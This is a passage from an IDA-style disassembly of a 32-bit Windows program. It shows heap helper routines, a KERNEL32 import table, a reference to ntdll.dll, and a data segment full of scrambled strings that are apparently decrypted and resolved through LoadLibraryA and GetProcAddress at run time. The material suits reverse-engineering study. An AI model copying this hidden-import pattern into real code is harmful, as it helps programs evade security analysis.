add esi, 4
jmp short loc_402A08
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_402A03+9�j
pop esi
retn
sub_402A03 endp
; =============== S U B R O U T I N E =======================================
sub_402A1D proc near ; CODE XREF: start+4B�p
push 20h
pop eax
push 4
push eax
mov dword_404344, eax
call sub_402A51
pop ecx
mov dword_404340, eax
pop ecx
retn
sub_402A1D endp
; =============== S U B R O U T I N E =======================================
sub_402A35 proc near ; CODE XREF: start+84�p
mov ecx, dword_404348
test ecx, ecx
jz short locret_402A50
mov eax, dword_404340
lea ecx, [eax+ecx*4]
push ecx
push eax
call sub_402A03
pop ecx
pop ecx
locret_402A50: ; CODE XREF: sub_402A35+8�j
retn
sub_402A35 endp
; =============== S U B R O U T I N E =======================================
sub_402A51 proc near ; CODE XREF: sub_402A1D+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
imul eax, [esp+arg_4]
push eax ; dwBytes
push 8 ; dwFlags
call ds:GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call ds:HeapAlloc
retn
sub_402A51 endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00003000)
; Virtual size : 0000018C ( 396.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+E�p
; DATA XREF: sub_401000+E�r
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_401030+5�p
; DATA XREF: sub_401030+5�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401540+9�p
; sub_401910+1C�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401910+327�p
; DATA XREF: sub_401910+327�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401910+35�p
; sub_401910+42�p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_401910+9�p
; sub_4025C0+A�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_4025C0+64�p
; DATA XREF: sub_4025C0+64�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_4025C0+3F�p
; DATA XREF: sub_4025C0+3F�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_4025C0+37�p
; sub_4025C0+C8�p
; DATA XREF: ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: start+8A�p
; DATA XREF: start+8A�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+45�p
; DATA XREF: start+45�r
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start+7�p
; DATA XREF: start+7�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_402A51+13�p
; DATA XREF: sub_402A51+13�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: sub_402A51+C�p
; DATA XREF: sub_402A51+C�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 403038h
dd 0
dd 3064h, 2 dup(0)
dd 312Eh, 3000h, 5 dup(0)
dd 30A0h, 30AEh, 30BCh, 30CCh, 30DAh, 30ECh, 3100h, 3110h
dd 3120h, 313Ch, 314Ah, 315Ch, 316Eh, 317Ah, 0
dd 6C470181h, 6C61626Fh, 6F6C6C41h, 1880063h, 626F6C47h
dd 72466C61h, 6565h, 6F4C01C2h, 694C6461h, 72617262h, 4179h
dd 724600B4h, 694C6565h, 72617262h, 13E0079h, 50746547h
dd 41636F72h, 65726464h, 7373h, 65470126h, 646F4D74h, 48656C75h
dd 6C646E61h, 4165h, 6547011Ah, 73614C74h, 72724574h, 726Fh
dd 65530271h, 73614C74h, 72724574h, 726Fh, 6C43001Bh, 4865736Fh
dd 6C646E61h, 454B0065h, 4C454E52h, 642E3233h, 6C6Ch, 7845007Dh
dd 72507469h, 7365636Fh, 1500073h, 53746547h, 74726174h
dd 6E497075h, 416F66h, 654700CAh, 6D6F4374h, 646E616Dh
dd 656E694Ch, 1990041h, 70616548h, 6F6C6C41h, 1400063h
dd 50746547h, 65636F72h, 65487373h, 7061h, 1Dh dup(0)
_rdata ends
; Section 3. (virtual address 00004000)
; Virtual size : 0000034C ( 844.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00002200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 404000h
dword_404000 dd 0 dword_404004 dd 0 aX0ffka1pix db 'X0FFKa1pix',0 ; DATA XREF: sub_401C50+9�o
; sub_401C50+30�o ...
align 4
; char ModuleName[]
ModuleName db 'Vs' ; DATA XREF: sub_401910+4�o
; sub_401C50+4�o ...
db 12h
aSsB db 'Sb)',0
align 10h
; char aSle[]
aSle db 'Se' ; DATA XREF: sub_401910+15�o
; sub_401C50+22�o ...
db 10h
dd 3C851191h, 0D258446Bh, 0
; char ProcName[]
ProcName db 'ne',0Ah,'' ; DATA XREF: sub_401910+2D�o
; sub_401C50+88�o ...
db 1Ch, 0DAh, 4Fh
db ')L[',0
align 10h
; char aNzeB[]
aNzeB db 'ne',0Ah,'' ; DATA XREF: sub_401910+37�o
; sub_401C50+BB�o ...
db 1Ch, 0DAh, 4Fh
dd 0DD5B4C29h, 5715h
; const CHAR dword_404050
dword_404050 dd 3363AB7Fh, 62C3199Bh, 0D25D6620h, 6FBD6135h, 74Bh
; DATA XREF: sub_401910+44�o
; sub_401C50+F7�o ...
; char aBB[]
aBB db 'bB' ; DATA XREF: sub_401910+51�o
; sub_401C50+12D�o ...
db 10h
dd 58C61C99h, 0F143452Ch, 61B97C36h, 3CD42F5Ah, 0
; char aR[]
aR db '~r',1Bh,'' ; DATA XREF: sub_401910+5E�o
; sub_401C50+157�o ...
db 14h, 0D4h, 7Ch
dd 4D5224h
; char aR_0[]
aR_0 db '{r' ; DATA XREF: sub_401910+6B�o
; sub_401C50+18A�o ...
db 1Fh
dd 7CE61880h, 0CD51432Ah, 6E23h
; const CHAR dword_404098
dword_404098 dd 2A63AB7Fh, 6FD30F9Ch, 0D05B6321h, 76A44A24h, 0
; DATA XREF: sub_401910+78�o
; sub_401C50+1D0�o ...
; char aJlv[]
aJlv db 'jv' ; DATA XREF: sub_401910+85�o
; sub_401C50+1F0�o ...
db 1Ah
dd 6DD90FA4h, 0F3475320h, 70B34235h, 57h
; char aNzeB_0[]
aNzeB_0 db 'ne',0Ah,'' ; DATA XREF: sub_401910+92�o
; sub_401C50+223�o ...
db 1Ch, 0DAh, 5Fh
dd 0C7464530h, 5715h
; char aNzeB_1[]
aNzeB_1 db 'ne',0Ah,'' ; DATA XREF: sub_401910+9F�o
; sub_401C50+262�o ...
db 1Ch, 0DAh, 5Eh
a7o@3Sz db '7O@3[z',0
align 4
; char aOSAEg[]
aOSAEg db 'o~',0Ah ; DATA XREF: sub_401910+AC�o
; sub_401C50+28C�o ...
db '-a&EG'
dd 6DB14A1Dh, 3F5Ch
; char aKlc[]
aKlc db 'kc*' ; DATA XREF: sub_401910+B9�o
; sub_401C50+2C8�o ...
db 0Fh, 0D3h, 6Fh
aCJdv db '!c[$Jv',0
align 4
; char aJldS[]
aJldS db 'jd',0Bh,'' ; DATA XREF: sub_401910+C6�o
; sub_401C50+2F2�o ...
db 18h, 0E2h, 66h
a7eu db '7EU',0
align 4
; char aVxS5Lq[]
aVxS5Lq db '{x',0Dh,'5`!LQ',0 ; DATA XREF: sub_401910+D3�o
; sub_401C50+325�o ...
; char aLle[]
aLle db 'le' ; DATA XREF: sub_401910+E0�o
; sub_401C50+358�o ...
db 13h
dd 7AD7139Dh, 0D1467020h, 71AF4A33h, 0
; char aNzeB_2[]
aNzeB_2 db 'ne',0Ah,'' ; DATA XREF: sub_401910+ED�o
; sub_401C50+3A1�o ...
db 1Ch, 0DAh, 48h
dd 514537h
; char aKvrD[]
aKvrD db 'kr',1Bh,'',0 ; DATA XREF: sub_401910+114�o
; sub_401C50+427�o ...
align 10h
; char aKlc2i[]
aKlc2i db 'kc2' ; DATA XREF: sub_401910+107�o
; sub_401C50+3C1�o ...
db 1Eh, 0D7h, 62h
dd 0DB594911h, 0
; const CHAR dword_404160
dword_404160 dd 3263AB7Fh, 62D71E9Bh, 0DB594911h, 0 ; sub_401C50+3F4�o ...
; char aJI[]
aJI db 'j{=' ; DATA XREF: sub_401910+121�o
; sub_401C50+45A�o ...
db 10h, 0C6h, 7Ch
dd 0FC475320h, 67BA4925h, 5Ch
; char aJS[]
aJS db 'j{:' ; DATA XREF: sub_401910+12E�o
; sub_401C50+48D�o ...
db 1Eh, 0D9h, 63h
a5rqMidh db '5RQ#mdH#',0
; char aJ9s[]
aJ9s db 'j{9',9 ; DATA XREF: sub_401910+13B�o
; sub_401C50+4CC�o ...
dw 61F5h
dd 0DB465028h, 6DB55C23h, 20D41140h, 0DFDC1D60h, 0C3DC8A8Ch
dd 2FEFh
; char aR_1[]
aR_1 db '{r' ; DATA XREF: sub_401910+148�o
; sub_401C50+4F6�o ...
db 1Fh
dd 67F01880h, 754529h
; char aJlv_0[]
aJlv_0 db 'jv' ; DATA XREF: sub_401910+155�o
; sub_401C50+529�o ...
db 1Ah
dd 6BDA14B2h, 0
; const CHAR dword_4041D0
dword_4041D0 dd 3863AB7Fh, 5DD3119Dh, 0FB515A2Ch, 28h ; sub_401C50+56C�o ...
; char aKlc8a[]
aKlc8a db 'kc8' ; DATA XREF: sub_401910+162�o
; sub_401C50+58F�o ...
db 11h, 0D3h, 5Eh
aIz5 db '*IZ5]',0
align 10h
; char aYka[]
aYka db 'Ya' ; DATA XREF: sub_401910+1E�o
; sub_401C50+55�o ...
db 1Fh
dd 3C851484h, 0D258446Bh, 0
; const CHAR dword_404200
dword_404200 dd 2B63AB7Fh, 40C41887h, 0FF514D24h, 0 ; sub_401C50+5C2�o ...
; char aJlp1d[]
aJlp1d db 'jp1' ; DATA XREF: sub_401910+189�o
; sub_401C50+601�o ...
db 18h, 0D8h, 45h
dd 755920h
; char aJlpB[]
aJlpB db 'jp/' ; DATA XREF: sub_401910+196�o
; sub_401C50+62B�o ...
db 18h, 0C4h, 77h
dd 0CB584113h, 43A46A35h, 0
; char aJlpS[]
aJlpS db 'jp=' ; DATA XREF: sub_401910+1A3�o
; sub_401C50+65E�o ...
db 12h, 0C5h, 6Bh
dd 4D450Eh
dword_40423C dd 0C65BB7Bh, 5BC21391h, 464536h ; sub_401C50+6CD�o ...
dword_404248 dd 1A79AF4Bh, 0CE1296h ; sub_401C50+700�o ...
dword_404250 dd 1F60A34Eh, 1886h ; sub_401C50+72F�o ...
dword_404258 dd 0A79A17Bh, 2EDA1286h, 0DB5A4115h, 6D91733Ch, 0DE355Bh
; DATA XREF: sub_401C50+73D�o
; sub_401C50+769�o ...
dword_40426C dd 0E76B96Bh, 7DC312B9h, 0CA416220h, 71B24024h, 0
; DATA XREF: sub_401C50+760�o
; sub_401C50+798�o ...
dd 1C78A27Fh, 62F71195h, 574F29h, 1C78A27Fh, 7CF01195h
dd 4520h, 3263AB6Bh, 4BC20E95h, 0CC5B5237h, 0
dd 3263AB7Fh, 4BC20E95h, 0CC5B5237h, 0
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401540+2�o
align 4
dword_4042C4 dd 0 ; sub_401910+141�w ...
dword_4042C8 dd 0 ; sub_401910+8B�w ...
dword_4042CC dd 0 ; sub_401670+1E9�r ...
dword_4042D0 dd 0 ; sub_401910+64�w ...
dword_4042D4 dd 0 ; sub_401910+71�w ...
dword_4042D8 dd 0 ; sub_401910+14E�w ...
dword_4042DC dd 0 ; sub_401910+2AD�r
dword_4042E0 dd 0 ; sub_401910+311�r ...
dword_4042E4 dd 0 ; sub_401910+7E�w ...
dword_4042E8 dd 0 ; sub_401910+98�w ...
dword_4042EC dd 0 ; sub_401910+2DF�r ...
dword_4042F0 dd 0 ; sub_401910+A5�w ...
dword_4042F4 dd 0 ; sub_401910+FF�w ...
dword_4042F8 dd 0 ; sub_401910+B2�w ...
dword_4042FC dd 0 ; sub_401910+57�w ...
dword_404300 dd 0 ; sub_401910+2D5�r ...
dword_404304 dd 0 ; sub_401910+2A3�r
dword_404308 dd 0 ; sub_401910+2F3�r ...
dword_40430C dd 0 ; sub_401910+D9�w ...
dword_404310 dd 0 ; sub_401910+2B7�r
dword_404314 dd 0 ; sub_401910+CC�w ...
dword_404318 dd 0 ; sub_401910+307�r ...
dword_40431C dd 0 ; sub_401670+E7�r ...
dword_404320 dd 0 ; sub_401670+174�r ...
dword_404324 dd 0 ; sub_401910+2FD�r ...
dword_404328 dd 0 ; sub_4027C0+77�r
dword_40432C dd 0 ; sub_401910+295�r
dword_404330 dd 0 ; sub_401910+F3�w ...
dword_404334 dd 0 ; sub_401910+2E9�r ...
dword_404338 dd 0 ; sub_401910+3D�w ...
dword_40433C dd 0 dword_404340 dd 0 ; sub_402A35+A�r
dword_404344 dd 0 dword_404348 dd 0 align 100h
_data ends
end start